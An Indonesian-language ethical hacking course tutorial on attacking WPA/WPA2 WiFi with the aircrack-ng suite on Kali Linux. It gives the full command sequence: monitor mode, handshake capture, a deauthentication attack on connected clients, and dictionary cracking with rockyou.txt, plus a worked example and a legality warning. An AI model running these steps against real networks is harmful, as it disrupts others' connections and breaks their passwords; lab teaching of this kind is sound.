Hands-on: Menyerang Wireless Network dan Memecahkan Password WiFi
Berikut ini adalah penjelasan detail dan contoh mengenai Menyerang Wireless Network dan Memecahkan Password WiFi menggunakan KALI Linux 2024.3 untuk kebutuhan kuliah ethical hacking:
Prasyarat Alat dan Perangkat Lunak:
- Kali Linux 2024.3 yang sudah terinstal.
- Adapter WiFi yang mendukung mode monitor (contoh: Alfa AWUS036NHA).
- Tools:
- `airmon-ng` (mengaktifkan mode monitor)
- `airodump-ng` (menangkap paket)
- `aireplay-ng` (menginjeksi paket)
- `aircrack-ng` (memecahkan password WiFi)
Langkah-langkah Hands-on:
1. Mengaktifkan Mode Monitor pada WiFi Adapter
- Pertama, aktifkan WiFi adapter dan pastikan terdeteksi oleh sistem.
ifconfig
- Jalankan perintah berikut untuk mengaktifkan mode monitor:
sudo airmon-ng start wlan0 ```
- Catatan: Ganti `wlan0` dengan nama interface WiFi Anda. Ini akan mengaktifkan WiFi dalam mode monitor, memungkinkan Anda menangkap semua lalu lintas WiFi di sekitarnya.
2. Menangkap Lalu Lintas Jaringan dengan `airodump-ng
- Gunakan `airodump-ng` untuk menangkap paket WiFi di sekitar Anda:
sudo airodump-ng wlan0mon
- wlan0mon adalah nama interface yang ada di mode monitor. Perintah ini akan menampilkan daftar SSID, BSSID, channel, dan informasi jaringan lain di sekitar Anda.
3. Menargetkan Jaringan dan Menangkap Handshake
- Setelah melihat target jaringan (SSID/BSSID), fokus pada satu jaringan dengan perintah berikut:
sudo airodump-ng --bssid <BSSID_target> -c <channel> -w capture wlan0mon
- <BSSID_target> adalah MAC address dari access point, <channel> adalah nomor channel WiFi. Paket yang ditangkap akan disimpan dalam file bernama `capture`.
- Untuk mendapatkan handshake (data autentikasi WPA/WPA2), lakukan serangan deauthentication pada klien yang terhubung:
sudo aireplay-ng --deauth 10 -a <BSSID_target> -c <client_MAC> wlan0mon
- Ini akan memutuskan koneksi klien, dan ketika klien mencoba terhubung kembali, handshake akan tertangkap oleh airodump-ng.
4. Memecahkan Password WiFi dengan `aircrack-ng
- Setelah berhasil mendapatkan handshake, Anda bisa memecahkan password dengan dictionary attack menggunakan `aircrack-ng`:
sudo aircrack-ng -w /path/to/wordlist.txt -b <BSSID_target> capture-01.cap
- /path/to/wordlist.txt adalah lokasi wordlist (misalnya `rockyou.txt`), dan capture-01.cap adalah file yang berisi handshake. Aircrack-ng akan mencoba semua kata dalam wordlist untuk memecahkan password.
Contoh Kasus
Misalnya, kita mendapatkan informasi:
- BSSID jaringan target: `00:11:22:33:44:55`
- Channel: 6
- File wordlist: `/usr/share/wordlists/rockyou.txt`
Langkah-langkahnya:
- Jalankan `airodump-ng` dan targetkan jaringan:
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon
- Lakukan serangan deauth:
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
- Setelah handshake tertangkap, pecahkan password:
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture-01.cap
Jika password ada dalam wordlist, hasilnya akan menampilkan password WiFi.
Etika dan Legalitas
Perlu diingat bahwa melakukan serangan WiFi tanpa izin merupakan tindakan ilegal. Ini hanya dilakukan dalam lingkungan pengujian yang terkontrol, seperti laboratorium atau jaringan pribadi dengan persetujuan pemilik.